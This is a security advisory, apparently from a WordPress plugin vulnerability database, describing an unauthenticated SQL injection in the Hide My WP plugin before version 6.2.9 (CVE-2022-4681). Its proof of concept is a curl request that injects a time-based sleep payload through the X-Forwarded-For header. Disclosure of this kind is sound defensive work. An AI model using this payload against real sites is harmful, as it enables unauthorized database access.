WordPress Plugin Vulnerabilities

Hide My WP < 6.2.9 - Unauthenticated SQLi

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

Affects Plugins

Plugin icon
hide_my_wp
Fixed in 6.2.9

References

CVE
CVE-2022-4681

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Xenofon Vassilakopoulos
Submitter
Xenofon Vassilakopoulos
Submitter website
https://xen0vas.github.io/
Submitter twitter
https://twitter.com/xen0vas
Verified
Yes
WPVDB ID
5a4096e8-abe4-41c4-b741-c44e740e8689

Timeline

Publicly Published
2023-01-11 (about 1 years ago)
Added
2023-01-11 (about 1 years ago)
Last Updated
2023-01-11 (about 1 years ago)

Other

Published
Title
Published
2024-04-11
Title
Shopping Cart & eCommerce Store < 5.6.4 - Contributor+ SQL Injection
Published
2023-10-11
Title
ChatBot < 4.9.1 - Unauthenticated Blind SQL Injection
Published
2014-08-01
Title
myLDlinker - SQL Injection
Published
2023-10-27
Title
Article Analytics <= 1.0 - Unauthenticated SQL injection
Published
2022-12-05
Title
Contest Gallery < 19.1.5 - Admin+ SQL Injection